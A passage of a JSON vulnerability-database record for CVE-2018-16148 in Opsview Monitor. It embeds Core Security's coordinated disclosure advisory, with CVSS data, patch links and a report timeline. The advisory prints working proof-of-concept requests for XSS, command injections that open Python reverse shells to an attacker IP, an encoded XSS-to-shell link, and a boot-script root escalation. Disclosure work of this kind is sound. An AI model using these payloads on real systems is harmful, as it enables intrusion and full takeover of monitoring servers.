"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2018-16148",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.9,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2018-17455",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2018-16148",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-16148",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2018-17455",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201809-157",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-16148",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The diagnosticsb2ksy parameter of the /rest endpoint in Opsview Monitor before 5.3.1 and 5.4.x before 5.4.2 is vulnerable to Cross-Site Scripting. OpsviewMonitor is a virtual appliance designed to be deployed in an organization\u0027s network infrastructure. It is bundled with the web management console to monitor and manage the host and its services. OpsviewMonitor has a cross-site scripting vulnerability that allows an attacker to exploit malicious JavaScript code in the context of a legitimate user. Core Security - Corelabs Advisory\nhttp://corelabs.coresecurity.com/\n\nOpsview Monitor Multiple Vulnerabilities\n\n1. **Advisory Information**\n\nTitle: Opsview Monitor Multiple Vulnerabilities\nAdvisory ID: CORE-2018-0008\nAdvisory URL:\nhttp://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities\nDate published: 2018-09-04\nDate of last update: 2018-09-04\nVendors contacted: Opsview\nRelease mode: Coordinated release\n\n2. **Vulnerability Information**\n\nClass: Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Input During Web Page Generation\n[CWE-79], Improper Neutralization of Special Elements used in an OS\nCommand [CWE-78], Improper Neutralization of Special Elements used in\nan OS Command [CWE-78], Execution with Unnecessary Privileges [CWE-250]\nImpact: Code execution\nRemotely Exploitable: Yes\nLocally Exploitable: Yes\nCVE Name: CVE-2018-16148, CVE-2018-16147, CVE-2018-16146, CVE-2018-16144,\nCVE-2018-16145\n\n3. **Vulnerability Description**\n\nOpsview\u0027s website states that:\n\nOpsview[1] builds monitoring software that helps DevOps understand how\nthe performance of their hybrid IT infrastructure \u0026 apps impacts\nbusiness service delivery. Opsview Monitor supports +3500 Nagios plugins\nand service checks making it easy to monitor everything from Docker and\nVMware to Amazon Web Services, Hyper-V and more. \n\n4. **Vulnerable Packages**\n\n . Opsview Monitor 5.4\n . 
Opsview Monitor 5.3\n . Opsview Monitor 5.2\n\nOther products and versions might be affected, but they were not tested. \n\n5. **Vendor Information, Solutions and Workarounds**\n\nOpsview released the following versions of its product that fix the\nreported issues. Opsview Monitor 6.0\n . Opsview Monitor 5.4.2\n . Opsview Monitor 5.3.1\n\nIn addition, Opsview published the following release notes:\n\n . https://knowledge.opsview.com/v5.4/docs/whats-new\n . https://knowledge.opsview.com/v5.3/docs/whats-new\n\n6. **Credits**\n\nThese vulnerabilities were discovered and researched by Fernando Diaz\nand Fernando Catoira from Core Security Consulting Services. The\npublication of this advisory was coordinated by Leandro Cuozzo from Core\nAdvisories Team. \n \n7. \nMultiple vulnerabilities were found in the context of this appliance,\nwhich could allow a remote attacker to compromise the system. \nIn addition, issues presented in 7.3 and 7.4 could allow an attacker to\nobtain command execution on the system as the nagios user. Finally, the\nissue found in one of the scripts run during the boot process presented\nin 7.5 would allow attackers to elevate their privileges from nagios\nuser to root after a system restart, hence obtaining full control of the\nappliance. \n\n7.1. \n\nThe following proof of concept demonstrates the vulnerability:\n\n/-----\nGET\n/rest/diagnosticsb2ksy%253cscript%253ealert(1)%253c%252fscript%253ev7uol%3ffilename=1%26download=1\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nCookie: opsview_web_session=46f985298c7bba5291a18c3a749362a08eaa9401;\nauth_tkt=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%3D%3D\nDNT: 1\nConnection: close\nUpgrade-Insecure-Requests: 1\n-----/\n\n7.2. 
The following proof of\nconcept demonstrates the vulnerability:\n \n/-----\nPOST /settings/api/router?_dc=1521575692128 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: rifle\nx-opsview-token: 053f415648640ea5a9d0c6e3e7f5603cf7b08503\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 506\nCookie: opsview_web_session=3b8059865b28b96a5cd27a6d4fb4193bed9aa256;\nauth_tkt=ZTFiMzFlODc1ZDUzYzk3MzEwMGM2MjhiZTgxMzRhMDQ1YWIxNWNlOXBlbnRlc3QhREFTSEJPQVJELERBU0hCT0FSREVESVQsREFTSEJPQVJEU0hBUkUsTkFWT1BUSU9OUyxOT1RJRllTT01FLFBBU1NXT1JEU0FWRSxSUkRHUkFQSFMsVklFV0FMTCE%3D\nConnection: close\n\n[{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":2},{\"action\":\"SettingsServer\",\"method\":\"setObjecttypeState\",\"data\":[\"profile\",\"{\\\"storeState\\\":{\\\"sorters\\\":[{\\\"root\\\":\\\"data\\\",\\\"property\\\":\\\"name\\\",\\\"direction\\\":\\\"ASC\\\"}],\\\"filters\\\":[],\\\"pageSize\\\":50,\\\"page\\\":1}}\"],\"type\":\"rpc\",\"tid\":3}]\n-----/\n\nThe input will be stored without any sanitization and rendered every\ntime the /settings section is visited by the user. It\u0027s important to\npoint that this XSS is self stored and it\u0027s executed only in the context\nof the victim\u0027s session. 
\nExcerpt of the source code showing the injected script tag:\n\n/-----\n[{\"property\":\"name\",\"root\":\"data\",\"direction\":\"ASC\"}]}},\"contact\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"name\",\"root\":\"data\"}]}},\"\u003c/script\u003e\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"root\":\"data\",\"property\":\"name\",\"direction\":\"ASC\"}],\"pageSize\":50,\"filters\":[],\"page\":1}},\"hostcheckcommand\":{\"storeState\":{\"pageSize\":50,\"filters\":[],\"page\":1,\"sorters\":[{\"direction\":\"ASC\",\"property\":\"priority\",\"root\":\"data\"}]}},\"netflow_collector\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"page\":1,\"filters\":[],\"pageSize\":50}},\"\u003cscript\u003ealert(4)\u003c/script\u003e\":{\"storeState\":{\"sorters\":[{\"direction\":\"ASC\",\"root\":\"data\",\"property\":\"name\"}],\"\n-----/\n\n7.3. **Notification abuse leading to remote command execution**\n\n[CVE-2018-16146] Opsview Web Management console provides a functionality\naccessible by an authenticated administrator to test notifications that\nare triggered under certain configurable events. The \u0027value\u0027 parameter\nis not properly sanitized, leading to an arbitrary command injection\nexecuted on the system with nagios\u0027 user privileges. 
\n \nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/notificationmethod/testnotification?_dc=1520444703477\nHTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:58.0)\nGecko/20100101 Firefox/58.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: 7ac1116c336cc648cda6caa707a17d7aa6114074\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 376\nCookie: redirect=1; testing=1; sid=9bfa04afc5ccc966c623078bab8834e0;\nopsview_web_session=5071271ffb62fffffcb589c9ae9ab9c23d780b13;\nauth_tkt=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%3D%3D\nConnection: close\n\n{\"message\":\"Test\nMessage\",\"command\":\"submit_xmpp_script\",\"variables\":[],\"test_variables\":[{\"name\":\"PAGER\",\"value\":\"123123123\n|| python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\\\"\u003cattackerIP\u003e\\\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\\\"/bin/sh\\\",\\\"-i\\\"]);\u0027\"}],\"id\":\"20\"}\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nAdditionally, it is possible to combine this issue with a redirection\nfunctionality within the management console and the vulnerability\ndescribed in 7.1 (Reflected Cross-Site Scripting), to build a specially\ncrafted link that could be sent to an administrator to trigger a reverse\nshell. \n\nIn order to perform the attack, consider the following:\n\n. API\u0027s sensitive actions require a \u0027restToken\u0027 to be processed. 
Abuse the login page redirection functionality to force the user to\naccess the Cross-Site Scripting vulnerable URL described in 7.1 (you may\nalso abuse the Cross-Site scripting vulnerability reported in\nhttps://www.cvedetails.com/cve/CVE-2016-2511/ given it is still present). \nIf the user is already authenticated he will be automatically redirected. \nOtherwise, the login page will appear and the redirection will take\nplace after a successful login. \n\nThe following proof of concept presents a crafted link that could\ntrigger a reverse shell if accessed by an administrator:\n\n/-----\nhttps://\u003cserverIP\u003e/login?back=%2Frest%2Fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmFyIHhociA9IG5ldyBYTUxIdHRwUmVxdWVzdCgpO3hoci5vbnJlYWR5c3RhdGVjaGFuZ2UgPSBmdW5jdGlvbigpIHtpZiAoeGhyLnJlYWR5U3RhdGUgPT0gWE1MSHR0cFJlcXVlc3QuRE9ORSl7cmVnZXhwID0gLyg%2FOnJlc3RUb2tlbiI6IikoLio%2FKSg%2FOiIpLzt0b2tlbiA9IHJlZ2V4cC5leGVjKHhoci5yZXNwb25zZVRleHQpWzFdO3JlZ2V4cCA9IC8oPzp1c2VyTmFtZSI6IikoLio%2FKSg%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%2BXCIsMTYwMDApKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFtcIi9iaW4vc2hcIixcIi1pXCJdKTsnIn1dLCJpZCI6IjEifTt4aHIyLnNlbmQoSlNPTi5zdHJpbmdpZnkoYm9keSkpO2FsZXJ0KHRva2VuKTthbGVydCh1c2VybmFtZSk7fX07eGhyLm9wZW4oJ1BPU1QnLCAnL3NldHRpbmdzLycsIHRydWUpO3hoci5zZW5kKG51bGwpOw%3D%3D%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1\n-----/\n\nOnce clicked, the authenticated administrator will be redirected to the\nvulnerable section where his browser will perform a request to the\n\u0027/settings\u0027 endpoint in order to obtain a valid \u0027restToken\u0027. Finally,\nusing that token, the API request to\n\u0027rest/config/notificationmethod/testnotification\u0027 will be exploited thus\nresulting in a reverse shell. \n\n7.4. 
**Rancid test connection functionality abuse leading to command\nexecution**\n\n[CVE-2018-16144] NetAudit is a section within Network Analyzer that\nallows the user to automate the backing up of network devices\u0027\nconfiguration files to a centralized location. The test connection\nfunctionality is vulnerable to command injection due to an improper\nsanitization of the \u0027rancid_password\u0027 parameter. \n\nThe following proof of concept executes a reverse shell:\n\n/-----\nPOST /rest/config/host/test_rancid_connection?_dc=1521569909290 HTTP/1.1\nHost: \u003cserverIP\u003e\nUser-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:59.0)\nGecko/20100101 Firefox/59.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://\u003cserverIP\u003e/settings/\nx-opsview-username: admin\nx-opsview-token: b3d716e0157fd6337e6978220188051d8c578850\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\nX-Requested-With: XMLHttpRequest\nContent-Length: 434\nCookie: opsview_web_session=8f48a60452543863c3ee3662202a0d0ef568e86f;\nauth_tkt=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%3D%3D\nConnection: close\n\nip=\u003cattackerIP\u003e++++++\u0026rancid_vendor=1\u0026rancid_username=234234+add+password+xxxxx\u0026rancid_connection_type=telnet\u0026rancid_autoenable=1\u0026rancid_password=2342342342+%3b+sleep%2011%3b%20`python+-c+\u0027import+socket,subprocess,os%3bs%3dsocket.socket(socket.AF_INET,socket.SOCK_STREAM)%3bs.connect((\"\u003cattackerIP\u003e\",16000))%3bos.dup2(s.fileno(),0)%3b+os.dup2(s.fileno(),1)%3b+os.dup2(s.fileno(),2)%3bp%3dsubprocess.call([\"/bin/sh\",\"-i\"])%3b\u0027`\u0026host_id=2\n-----/\n\n/-----\nnc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 43016)\n$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n$ uname -a\nLinux image-builder-299 4.4.0-1010-aws #10-Ubuntu SMP 
Tue Jan 9 23:01:34\nUTC 2018 x86_64 x86_64 x86_64 GNU/Linux\n-----/\n\n7.5. **Script modification could allow local privilege escalation**\n\n[CVE-2018-16145] Most of the services in Opsview Monitor run with nagios\nprivileges and the scripts that run at boot time, impersonate nagios\nuser during its execution. However, the\n\u0027/etc/init.d/opsview-reporting-module\u0027 script invokes the\n\u0027/opt/opsview/jasper/bin/db_jasper\u0027 script before dropping root\nprivileges. \n \nThe following excerpt shows the vulnerable code:\n \n/-----\n/etc/init.d/opsview-reporting-module:\n\n/opt/opsview/jasper/bin/db_jasper db_exists 2\u003e /dev/null\nif [ $? != 0 ]; then\n echo \"Attempted to start jasperserver but MySQL credentials are wrong.\"\n exit 0\nfi\n\nDAEMON=/opt/opsview/jasper/bin/rc.jasperserver\n\ntest -x $DAEMON || exit 0\n\n# Switch to opsview user if run as root\nid | grep \"uid=0(\" \u003e/dev/null\nif [ $? = 0 ] ; then\n su - opsview -c \"$DAEMON $@\"\nelse\n exec $DAEMON $@\nfi\n-----/\n\nThe file \u0027/opt/opsview/jasper/bin/db_jasper\u0027, which is invoked by the\nvulnerable script, can be edited by the nagios user which belongs to the\n\u0027opsview\u0027 group. \n \n/-----\nls -ltr /opt/opsview/jasper/bin/db_jasper\n-rwxrwxr-x 1 opsview opsview 2531 Feb 6 2017\n/opt/opsview/jasper/bin/db_jasper\nnagios@image-builder-299:/home/admin$ id\nuid=998(nagios) gid=997(nagios) groups=997(nagios),998(nagcmd),999(opsview)\n-----/\n\nSince \u0027db_jasper\u0027 receives \u0027db_exists\u0027 as an argument, which is later\nused in a case statement, an attacker could edit that specific part of\nthe script in order to execute arbitrary code once the appliance is\nrebooted. 
\n\nThe following excerpt shows the attacker\u0027s bash script which, after\nexecution, will trigger a reverse shell with root privileges:\n\n/-----\nwhile [ \"x$1\" != \"x\" ] ; do\n case \"$1\" in\n db_export)\n db_export\n ;;\n db_export_test)\n db_export_test\n ;;\n db_export_initial)\n TEST=1\n db_backup\n ;;\n db_import)\n db_import\n ;;\n db_install)\n db_install\n ;;\n db_backup)\n db_backup\n ;;\n db_restore)\n db_restore\n ;;\n db_exists)\n python -c \u0027import\nsocket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"\u003cattackerIP\u003e\",16000));os.dup2(s.fileno(),0);\nos.dup2(s.fileno(),1);\nos.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);\u0027 \u0026\n db_exists\n exit $?\n ;;\n db_upgrade)\n db_upgrade\n exit $?\n ;;\n *)\n die \"Usage: $0\n{db_export|db_import|db_install|db_backup|db_restore}\"\n ;;\n\n esac\n shift\ndone\n-----/\n\n/-----\n$nc -lvp 16000\nListening on [0.0.0.0] (family 0, port 16000)\nConnection from [\u003cserverIP\u003e] port 16000 [tcp/*] accepted (family 2,\nsport 45566)\n# id\nuid=0(root) gid=0(root) groups=0(root)\n-----/\n\n8. **Report Timeline**\n\n2018-05-03: Core Security sent an initial notification to Opsview,\nasking for GPG keys in order to send draft advisory. \n2018-05-04: Opsview replied attaching its GPG keys. \n2018-05-04: Core Security sent the encrypted draft advisory. \n2018-05-04: Opsview confirmed the reception of the advisory and informed\nan initial response would be ready by May 11th. \n2018-05-11: Opsview replied saying they were able to reproduce all of\nthe reported vulnerabilities and confirmed that they were present in all\nsupported versions of Opsview Monitor (5.4, 5.3 and 5.2). \nIn addition, Opsview informed that were planning to release a fix for\nthese versions by the end of July. \n2018-05-11: Core Security thanked the confirmation. 
\n2018-06-25: Opsview informed that they were planning to release a major\nupdate for the product (6.0) at the end of July. This update will\naddress all reported vulnerabilities. Also, they informed that the\nprevious versions of the product would be fixed by the end of August. \n2018-06-27: Core Security thanked the status update and asked for a\ntentative public disclosure date. \n2018-07-16: Core Security requested a status update. \n2018-07-18: Opsview proposed to set a tentative publication date by the\nend of August when they release the fixes for its earlier versions. \n2018-07-18: Core Security agreed with the Opsview\u0027s proposal. \n2018-07-23: Opsview notified Core Security that the Opsview Monitor 6.0\nrelease will be available on July 25th. In addition, they\ninformed that they didn\u0027t have the exact release date for the updates to\nprevious versions of the product. \n2018-08-06: Core Security requested a status update for the remaining\nfixes. \n2018-08-13: Opsview replied saying that they were targeting the week of\nAugust 24th for release the fixes of their earlier product versions and\nthey would confirm the exact date at the end of the next week. \n2018-08-13: Core Security thanked the reply. \n2018-08-24: Opsview informed Core Security that the remaining fixed\nversions will be available on August 29th. \n2018-08-24: Core Security thanked the update and proposed September 4th\nas the coordinated release date. \n2018-08-28: Opsview agreed on the proposed release date. \n2018-09-04: Advisory CORE-2018-0008 published. \n\n9. **References**\n\n[1] https://www.opsview.com/solutions\n\n10. **About CoreLabs**\n\nCoreLabs, the research center of Core Security, is charged with\nanticipating the future needs and requirements for information security\ntechnologies. \nWe conduct our research in several important areas of computer security\nincluding system vulnerabilities, cyber attack planning and simulation,\nsource code auditing, and cryptography. 
Our results include problem\nformalization, identification of vulnerabilities, novel solutions and\nprototypes for new technologies. CoreLabs regularly publishes security\nadvisories, technical papers, project information and shared software\ntools for public use at: http://corelabs.coresecurity.com. \n\n11. **About Core Security**\n\nCore Security provides companies with the security insight they need to\nknow who, how, and what is vulnerable in their organization. The\ncompany\u0027s threat-aware, identity \u0026 access, network security, and\nvulnerability management solutions provide actionable insight and\ncontext needed to manage security risks across the enterprise. This\nshared insight gives customers a comprehensive view of their security\nposture to make better security remediation decisions. Better insight\nallows organizations to prioritize their efforts to protect critical\nassets, take action sooner to mitigate access risk, and react faster if\na breach does occur. \n\nCore Security is headquartered in the USA with offices and operations in\nSouth America, Europe, Middle East and Asia. To learn more, contact Core\nSecurity at (678) 304-4500 or info@coresecurity.com\n\n12. **Disclaimer**\n\nThe contents of this advisory are copyright (c) 2018 Core Security and\n(c) 2018 CoreLabs, and are licensed under a Creative Commons Attribution\nNon-Commercial Share-Alike 3.0 (United States) License:\nhttp://creativecommons.org/licenses/by-nc-sa/3.0/us/\n\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "PACKETSTORM",
"id": "149236"
}
],
"trust": 2.34
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-16148",
"trust": 3.2
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-17455",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157",
"trust": 0.6
},
{
"db": "VULMON",
"id": "CVE-2018-16148",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "149236",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"id": "VAR-201809-0906",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
}
],
"trust": 1.6
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
}
]
},
"last_update_date": "2023-12-18T12:01:17.640000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "5.3.1 - Security Update",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"title": "5.4.2 Released: 04th September 2018",
"trust": 0.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"title": "Patch for OpsviewMonitor Cross-Site Scripting Vulnerability",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/139517"
},
{
"title": "Opsview Monitor Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqbyid.tag?id=84509"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://seclists.org/fulldisclosure/2018/sep/3"
},
{
"trust": 1.8,
"url": "https://www.coresecurity.com/advisories/opsview-monitor-multiple-vulnerabilities"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.4/docs/whats-new"
},
{
"trust": 1.8,
"url": "https://knowledge.opsview.com/v5.3/docs/whats-new"
},
{
"trust": 0.9,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16148"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-16148"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/79.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/settings/"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com."
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16144"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16146"
},
{
"trust": 0.1,
"url": "http://corelabs.coresecurity.com/"
},
{
"trust": 0.1,
"url": "https://www.cvedetails.com/cve/cve-2016-2511/"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16145"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-16147"
},
{
"trust": 0.1,
"url": "https://\u003cserverip\u003e/login?back=%2frest%2fdiagnosticsb2ksy%253cscript%253eeval(atob(%27dmfyihhocia9ig5ldybytuxidhrwumvxdwvzdcgpo3hoci5vbnjlywr5c3rhdgvjagfuz2ugpsbmdw5jdglvbigpihtpziaoeghylnjlywr5u3rhdgugpt0gwe1mshr0cfjlcxvlc3qure9orsl7cmvnzxhwid0glyg%2fonjlc3rub2tlbii6iikolio%2fksg%2foiiplzt0b2tlbia9ihjlz2v4cc5legvjkhhoci5yzxnwb25zzvrlehqpwzfdo3jlz2v4cca9ic8opzp1c2vytmftzsi6iikolio%2fksg%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%2bxcismtywmdapkttvcy5kdxaykhmuzmlszw5vkcksmck7ig9zlmr1cdiocy5mawxlbm8okswxktsgb3muzhvwmihzlmzpbgvubygpldipo3a9c3vichjvy2vzcy5jywxskftcii9iaw4vc2hciixcii1pxcjdktsnin1dlcjpzci6ijeiftt4ahiylnnlbmqoslnpti5zdhjpbmdpznkoym9keskpo2fszxj0khrva2vuktthbgvydch1c2vybmftzsk7fx07eghylm9wzw4oj1bpu1qnlcanl3nldhrpbmdzlycsihrydwupo3hoci5zzw5kkg51bgwpow%3d%3d%27))%253c%25252fscript%253ev7uol%3ffilename=1%26download=1"
},
{
"trust": 0.1,
"url": "http://creativecommons.org/licenses/by-nc-sa/3.0/us/"
},
{
"trust": 0.1,
"url": "https://www.opsview.com/solutions"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-17455"
},
{
"db": "VULMON",
"id": "CVE-2018-16148"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-010276"
},
{
"db": "PACKETSTORM",
"id": "149236"
},
{
"db": "NVD",
"id": "CVE-2018-16148"
},
{
"db": "CNNVD",
"id": "CNNVD-201809-157"
}
]
},
"sources_release_date": {
"@context": {
